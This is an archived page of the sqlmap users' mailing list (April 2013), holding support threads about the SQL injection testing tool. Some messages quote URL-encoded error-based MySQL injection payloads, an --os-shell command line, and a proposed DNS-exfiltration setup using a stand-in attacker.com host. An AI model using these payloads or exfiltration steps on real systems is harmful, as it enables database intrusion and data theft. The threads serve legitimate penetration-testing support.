sqlmap-users Mailing List for sqlmap (Page 37)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Stephen S. <ss...@ss...> - 2013-04-24 11:22:14
|
Thanks! Always appreciate the work you do. Awesome that you can implement this so quickly. On Wed, Apr 24, 2013 at 11:17 PM, Miroslav Stampar < mir...@gm...> wrote: > Hi Stephen. > > Going to patch it today. > > Kind regards, > Miroslav Stampar > Dana 24.4.2013. 13:10 "Stephen Shkardoon" <ss...@ss...> je > napisao/la: > >> I have a particular injection that requires a lot of manual intervention, >> and as such, I'm doing dumps with --start=X --stop=X+50 (or so). However, >> this replaces the output/foo/table.csv, rather than appending each dump to >> it. >> >> An chance of a workaround (of course I can manually copy it as required , >> or a feature request being opened or anything like that? >> >> >> ------------------------------------------------------------------------------ >> Try New Relic Now & We'll Send You this Cool Shirt >> New Relic is the only SaaS-based application performance monitoring >> service >> that delivers powerful full stack analytics. Optimize and monitor your >> browser, app, & servers with just a few lines of code. Try New Relic >> and get this awesome Nerd Life shirt! >> http://p.sf.net/sfu/newrelic_d2d_apr >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> |
|
From: Miroslav S. <mir...@gm...> - 2013-04-24 11:17:52
|
Hi Stephen. Going to patch it today. Kind regards, Miroslav Stampar Dana 24.4.2013. 13:10 "Stephen Shkardoon" <ss...@ss...> je napisao/la: > I have a particular injection that requires a lot of manual intervention, > and as such, I'm doing dumps with --start=X --stop=X+50 (or so). However, > this replaces the output/foo/table.csv, rather than appending each dump to > it. > > An chance of a workaround (of course I can manually copy it as required , > or a feature request being opened or anything like that? > > > ------------------------------------------------------------------------------ > Try New Relic Now & We'll Send You this Cool Shirt > New Relic is the only SaaS-based application performance monitoring service > that delivers powerful full stack analytics. Optimize and monitor your > browser, app, & servers with just a few lines of code. Try New Relic > and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_apr > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Stephen S. <ss...@ss...> - 2013-04-24 11:09:46
|
I have a particular injection that requires a lot of manual intervention, and as such, I'm doing dumps with --start=X --stop=X+50 (or so). However, this replaces the output/foo/table.csv, rather than appending each dump to it. An chance of a workaround (of course I can manually copy it as required , or a feature request being opened or anything like that? |
|
From: warezhacking <war...@gm...> - 2013-04-19 20:48:02
|
[WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue160 2). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside c orresponding output files. |
|
From: Miroslav S. <mir...@gm...> - 2013-04-19 13:42:49
|
Hi Phillip. Thank you for your report and find it fixed in our official repository [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap On Fri, Apr 19, 2013 at 3:34 PM, Phillip Wylie <phi...@gm...>wrote: > Hi Miroslav, > > Here is the rest of the traceback. The first time I got the error, I did a > clean install. I deleted the old instance and installed a new one.. > > Kind regards, > > Phillip Wylie > > Traceback (most recent call last): > File "./sqlmap.py", line 87, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 575, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 160, in > action > conf.dbmsHandler.osShell() > File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 80, in > osShell > self.initEnv(web=web) > File "/pentest/database/sqlmap/lib/takeover/abstraction.py", line 181, > in initEnv > self.webInit() > File "/pentest/database/sqlmap/lib/takeover/web.py", line 197, in webInit > kb.docRoot = arrayizeValue(getDocRoot()) > File "/pentest/database/sqlmap/lib/core/common.py", line 631, in > getDocRoot > docRoot = absFilePath.split(pagePath)[0] > ValueError: empty separator > > [*] shutting down at 09:30:28 > > > > On Fri, Apr 19, 2013 at 3:56 AM, Miroslav Stampar < > mir...@gm...> wrote: > >> Hi Phillip. >> >> Could you please send a whole traceback? Those few lines below "Back-end >> DBMS" are crucial for us to find and resolve an issue. >> >> Kind regards, >> Miroslav Stampar >> >> >> On Thu, Apr 18, 2013 at 11:45 PM, Phillip Wylie <phi...@gm...>wrote: >> >>> [17:20:18] [CRITICAL] unhandled exception in sqlmap/1.0-dev-b7d4afc, >>> retry your run with the latest development version from the GitHub >>> repository. If the exception persists, please send by e-mail to ' >>> sql...@li...' or open a new issue at ' >>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following >>> text and any information required to reproduce the bug. The developers will >>> try to reproduce the bug, fix it accordingly and get back to >>> you. >>> sqlmap version: >>> 1.0-dev-b7d4afc >>> >>> Python version: >>> 2.6.5 >>> >>> Operating system: >>> posix >>> >>> Command line: ./sqlmap.py -u ************** --level=5 --risk=3 >>> --cookie=****************************************************************************** >>> -p csid --dbms=MySQL --os-shell >>> Technique: >>> ERROR >>> >>> Back-end DBMS: MySQL (fingerprinted) >>> >>> >>> ------------------------------------------------------------------------------ >>> Precog is a next-generation analytics platform capable of advanced >>> analytics on semi-structured data. The platform includes APIs for >>> building >>> apps and a phenomenal toolset for data science. Developers can use >>> our toolset for easy data analysis & visualization. Get a free account! >>> http://www2.precog.com/precogplatform/slashdotnewsletter >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> -- >> Miroslav Stampar >> http://about.me/stamparm >> > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Marcell F. <fod...@gm...> - 2013-04-19 08:58:45
|
How to use --prefix and --suffix like paramaters testing POST request? I am having trouble with a POST parameter like this: ..&a=asd')[injection]-- -&b=1 I tried using: ..&a=asd')*-- -&b=1 and -p "a" but fails to find the injection point. Manually the point works. M |
|
From: Miroslav S. <mir...@gm...> - 2013-04-19 07:57:08
|
Hi Phillip. Could you please send a whole traceback? Those few lines below "Back-end DBMS" are crucial for us to find and resolve an issue. Kind regards, Miroslav Stampar On Thu, Apr 18, 2013 at 11:45 PM, Phillip Wylie <phi...@gm...>wrote: > [17:20:18] [CRITICAL] unhandled exception in sqlmap/1.0-dev-b7d4afc, retry > your run with the latest development version from the GitHub repository. If > the exception persists, please send by e-mail to ' > sql...@li...' or open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. The developers will > try to reproduce the bug, fix it accordingly and get back to > you. > sqlmap version: > 1.0-dev-b7d4afc > > Python version: > 2.6.5 > > Operating system: > posix > > Command line: ./sqlmap.py -u ************** --level=5 --risk=3 > --cookie=****************************************************************************** > -p csid --dbms=MySQL --os-shell > Technique: > ERROR > > Back-end DBMS: MySQL (fingerprinted) > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-04-18 22:58:40
|
Last one is a benign check for Suhosin patch (having dummy whitespaces): http://192.168.22.128:80/sqlmap/mysql/get_int.php?id=1%20AND%20%28SELECT%208912%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a62776e3a%2C%28SELECT%20%28CASE%20WHEN%20%288150%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%208150%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a616b6b3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 It checks whether server has limitations on payload length. If you want to override the dummy length used for this just go to the lib/core/settings.py and replace: SUHOSIN_MAX_VALUE_LENGTH = 512 with for example: SUHOSIN_MAX_VALUE_LENGTH = 50 Kind regards, Miroslav Stampar On Thu, Apr 18, 2013 at 10:21 PM, Konrads Smelkovs <ko...@sm...>wrote: > A php/mysql system has a simple, integer SQL injection. The only working > technique is error based (verified and successfully exploited manually). > Any other techniques cause the server to not reply, jus stall. When using > sqlmap with --dbms=mysql and --technique=E, sqlmap successfully does 3 > requests, but does something different on the fourth which causes the > server to time out and never reply. The successful requests are: > > * id=1%22%27%29%5B.%27%29%28%5D%5B > * > id=1%29%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286864%3D6864 > * > id=1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 > > The fourth request, which I sadly don't have saved, fails. Casual glance > suggested it was different from these and was not error based (I might be > wrong). > -- > Konrads Smelkovs > Applied IT sorcery. > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Phillip W. <phi...@gm...> - 2013-04-18 21:45:15
|
[17:20:18] [CRITICAL] unhandled exception in sqlmap/1.0-dev-b7d4afc, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to ' sql...@li...' or open a new issue at ' https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev-b7d4afc Python version: 2.6.5 Operating system: posix Command line: ./sqlmap.py -u ************** --level=5 --risk=3 --cookie=****************************************************************************** -p csid --dbms=MySQL --os-shell Technique: ERROR Back-end DBMS: MySQL (fingerprinted) |
|
From: Konrads S. <ko...@sm...> - 2013-04-18 20:37:16
|
A php/mysql system has a simple, integer SQL injection. The only working technique is error based (verified and successfully exploited manually). Any other techniques cause the server to not reply, jus stall. When using sqlmap with --dbms=mysql and --technique=E, sqlmap successfully does 3 requests, but does something different on the fourth which causes the server to time out and never reply. The successful requests are: * id=1%22%27%29%5B.%27%29%28%5D%5B * id=1%29%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286864%3D6864 * id=1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 The fourth request, which I sadly don't have saved, fails. Casual glance suggested it was different from these and was not error based (I might be wrong). -- Konrads Smelkovs Applied IT sorcery. |
|
From: Miroslav S. <mir...@gm...> - 2013-04-18 08:45:58
|
Hi. I see your point, but this is more a case for a some kind of PoC tool (and not sqlmap). Such scenario would (IMO) involve one more step in already non-simple setup. It's not that it doesn't have any sense, but it doesn't help the automated tool like sqlmap. Kind regards, Miroslav Stampar On Wed, Apr 17, 2013 at 7:09 PM, buawig <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > > Problem is that sqlmap needs to have data retrieved to be able to > > do it's normal workflow. For example, if you do --dump sqlmap > > needs to know table columns. In your proposed case that would be > > problematic. Also, there are lots of cases when we ask server for > > a simple questions and we need an answer to be able to proceed. > > > > Also, in sqlmap DNS exfiltration works only if one other slower > > technique is available (e.g. time-based blind and/or boolean-based > > blind). In your proposed case that technique would need to be > > ignored completely - as it's automatically being used if DNS > > exfiltration fails. > > Hi Miraoslav, > > thanks for your answer. > Yes, I wouldn't expect sqlmap to work "as usual" in such a scenario, > but the manual back and forth wouldn't probably be much fun. > > An automated approach would be to make DNS querries reaching the DNS > server available to sqlmap via HTTP since the internal host running > sqlmap can also reach the DNS server. > A simple script on the DNS server could simply write incoming DNS > queries to a file that can be fetched via HTTP from sqlmap. > > So the request flow would be: > > 1) sqlmap host -> target > 2) target makes DNS query to the attacker's DNS server > 3) DNS server makes inbound queries available via HTTP i.e. > https://attacker.com/dnsqueries.txt (optionally protected via HTTP auth) > 4) after (1) sqlmap fetches DNS queries from > https://attacker.com/dnsqueries.txt > > I realize that such an "internal" scenario might be not the most > common setup, but nonetheless I wanted to share that problem and some > thoughts about it. > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRbtdKAAoJEJeRHQyF0ukM2WMQAINOvTBT9CA0N/ny5FbLJbeA > UgW6ccUjeDDznI4vqOfq/LpRoStrOytkFiOoc4mWuCVHXG0wTTXIVgtQWHCZNkVd > io3a4K/AAaLy9I5PUw3cAhar2djPTyJaR5FhobSriex2Pq5oGgQ5bORMXrRZD4rO > f+dpZv2zVqNR9EMd5n56gmb1gkCQod8u3XrvN0WCiPOsK14y2tcMZPwpYAbJa68W > W7+6/7Q03aoRPCpkf65Qg2U9cilXgHv6CJhF+VHDG3ODsB/PqnerBVzgB3997QEl > Ei8lZrGua30e9ITd+qgKRILZjowRuTMiA/8BnktlMIFXh5fIn62k9xuT0B8d39kd > v0g7harf3+uEb2KcnfnuHjzWU+TX3grz2ObdSJSg31O7Z6xNgHSVpsAVYc6Jo+uu > CPggsaJZ5Mx9x3Av2kxmK1Tk/kXtMvTd0R6NowZsxU1rH/316LTnZna9nSL0Qb5S > fUmvyEc5SIBvDnSA+R/85UAEqcHvXSeZESL55Sg/3oqTRZKcTH/1dogfcAjBZ7GB > vFuo+VtJcPlLYqR/Lah/kvz0QVwTDmssirNz4aOhbdDjfpH+9iAjgVo3mbK1klr+ > H9jhnrevH/fykFng8WJg040UoSiBpdJuUjqNm2bqbK3p9a+LosmPQ9+u7yjqQHNn > FjIud4U9OHtX2Mh5nwr7 > =lb5m > -----END PGP SIGNATURE----- > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: buawig <bu...@gm...> - 2013-04-17 17:12:49
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 > Problem is that sqlmap needs to have data retrieved to be able to > do it's normal workflow. For example, if you do --dump sqlmap > needs to know table columns. In your proposed case that would be > problematic. Also, there are lots of cases when we ask server for > a simple questions and we need an answer to be able to proceed. > > Also, in sqlmap DNS exfiltration works only if one other slower > technique is available (e.g. time-based blind and/or boolean-based > blind). In your proposed case that technique would need to be > ignored completely - as it's automatically being used if DNS > exfiltration fails. Hi Miraoslav, thanks for your answer. Yes, I wouldn't expect sqlmap to work "as usual" in such a scenario, but the manual back and forth wouldn't probably be much fun. An automated approach would be to make DNS querries reaching the DNS server available to sqlmap via HTTP since the internal host running sqlmap can also reach the DNS server. A simple script on the DNS server could simply write incoming DNS queries to a file that can be fetched via HTTP from sqlmap. So the request flow would be: 1) sqlmap host -> target 2) target makes DNS query to the attacker's DNS server 3) DNS server makes inbound queries available via HTTP i.e. https://attacker.com/dnsqueries.txt (optionally protected via HTTP auth) 4) after (1) sqlmap fetches DNS queries from https://attacker.com/dnsqueries.txt I realize that such an "internal" scenario might be not the most common setup, but nonetheless I wanted to share that problem and some thoughts about it. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRbtdKAAoJEJeRHQyF0ukM2WMQAINOvTBT9CA0N/ny5FbLJbeA UgW6ccUjeDDznI4vqOfq/LpRoStrOytkFiOoc4mWuCVHXG0wTTXIVgtQWHCZNkVd io3a4K/AAaLy9I5PUw3cAhar2djPTyJaR5FhobSriex2Pq5oGgQ5bORMXrRZD4rO f+dpZv2zVqNR9EMd5n56gmb1gkCQod8u3XrvN0WCiPOsK14y2tcMZPwpYAbJa68W W7+6/7Q03aoRPCpkf65Qg2U9cilXgHv6CJhF+VHDG3ODsB/PqnerBVzgB3997QEl Ei8lZrGua30e9ITd+qgKRILZjowRuTMiA/8BnktlMIFXh5fIn62k9xuT0B8d39kd v0g7harf3+uEb2KcnfnuHjzWU+TX3grz2ObdSJSg31O7Z6xNgHSVpsAVYc6Jo+uu CPggsaJZ5Mx9x3Av2kxmK1Tk/kXtMvTd0R6NowZsxU1rH/316LTnZna9nSL0Qb5S fUmvyEc5SIBvDnSA+R/85UAEqcHvXSeZESL55Sg/3oqTRZKcTH/1dogfcAjBZ7GB vFuo+VtJcPlLYqR/Lah/kvz0QVwTDmssirNz4aOhbdDjfpH+9iAjgVo3mbK1klr+ H9jhnrevH/fykFng8WJg040UoSiBpdJuUjqNm2bqbK3p9a+LosmPQ9+u7yjqQHNn FjIud4U9OHtX2Mh5nwr7 =lb5m -----END PGP SIGNATURE----- |
|
From: Miroslav S. <mir...@gm...> - 2013-04-17 09:07:02
|
Hi Brian. How about: python sqlmap.py -d "mssql://DOMAIN\user:pass@10.10.10.10:1433/REMOTE_DB" or python sqlmap.py -d "mssql://DOMAIN\\user:pass@10.10.10.10:1433/REMOTE_DB" However, maybe something else could be wrong in your case. Please take a look here [1] Kind regards, Miroslav Stampar [1] http://stackoverflow.com/questions/14367383/unexpected-eof-connecting-to-sql-server On Wed, Apr 17, 2013 at 3:52 AM, Brian Milliron <Br...@ec...>wrote: > What is the correct format to make a direct connection to a database > using windows domain credentials? > I have tried > ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred > "DOMAIN\user:pass" > ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred > "DOMAIN\\user:pass" > ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred > "DOMAIN\user:pass" --auth-type NTLM > ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB" > > I get this error "[CRITICAL] DB-Lib error message 20017, severity 9: > Unexpected EOF from the server > Net-Lib error during Operation now in progress Error 115 - Operation now > in progressDB-Lib error message 20002, severity 9: > Adaptive Server connection failed" > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-04-17 06:08:53
|
Hi. Problem is that sqlmap needs to have data retrieved to be able to do it's normal workflow. For example, if you do --dump sqlmap needs to know table columns. In your proposed case that would be problematic. Also, there are lots of cases when we ask server for a simple questions and we need an answer to be able to proceed. Also, in sqlmap DNS exfiltration works only if one other slower technique is available (e.g. time-based blind and/or boolean-based blind). In your proposed case that technique would need to be ignored completely - as it's automatically being used if DNS exfiltration fails. Kind regards, Miroslav Stampar On Apr 16, 2013 11:50 PM, "buawig" <bu...@gm...> wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > Hi, > > in cases where sqlmap is run against targets on internal networks it > would be great if one could tell sqlmap to simply proceed without > expecting incoming DNS requests, because sqlmap can not be executed > directly on the DNS server (which can't reach the target, but the > target can reach the DNS server). > > For me it would be enough to simply run something like > - -u ... --dns-domain=attacker.com --dns-port=0 > (--dns-port does not exist [yet]) > > to let sqlmap know that it doesn't need to start a DNS listener. > > I would then collect and decode the DNS querries on the DNS server > manually, but I could also envision running a second sqlmap instance > on the DNS server with --dns-domain (but without -u) doing that job. > > -----BEGIN PGP SIGNATURE----- > > iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p > dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf > WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz > cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU > uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos > D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C > JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN > QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx > J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O > yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF > plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz > N5xHRCVPLLSrPfTPiyIJ > =JSkD > -----END PGP SIGNATURE----- > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Brandon P. <bpe...@gm...> - 2013-04-17 02:11:36
|
Try DOMAIN\\\\ (four slashes)
Just a thought, this comes up in ruby sometimes as well:
file_local_write(@dest,"reg deleteval -k
HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\
NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v
#{username}")
On Tue, Apr 16, 2013 at 8:52 PM, Brian Milliron <Br...@ec...>wrote:
> What is the correct format to make a direct connection to a database
> using windows domain credentials?
> I have tried
> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred
> "DOMAIN\user:pass"
> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred
> "DOMAIN\\user:pass"
> ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred
> "DOMAIN\user:pass" --auth-type NTLM
> ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB"
>
> I get this error "[CRITICAL] DB-Lib error message 20017, severity 9:
> Unexpected EOF from the server
> Net-Lib error during Operation now in progress Error 115 - Operation now
> in progressDB-Lib error message 20002, severity 9:
> Adaptive Server connection failed"
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
|
|
From: Brian M. <Br...@EC...> - 2013-04-17 02:05:08
|
What is the correct format to make a direct connection to a database using windows domain credentials? I have tried ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred "DOMAIN\user:pass" ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred "DOMAIN\\user:pass" ./sqlmap.py -d "mssql://10.10.10.10:1433/REMOTE_DB" --dbms-cred "DOMAIN\user:pass" --auth-type NTLM ./sqlmap.py -d "mssql://user:pass@10.10.10.10:1433/REMOTE_DB" I get this error "[CRITICAL] DB-Lib error message 20017, severity 9: Unexpected EOF from the server Net-Lib error during Operation now in progress Error 115 - Operation now in progressDB-Lib error message 20002, severity 9: Adaptive Server connection failed" |
|
From: buawig <bu...@gm...> - 2013-04-16 21:30:04
|
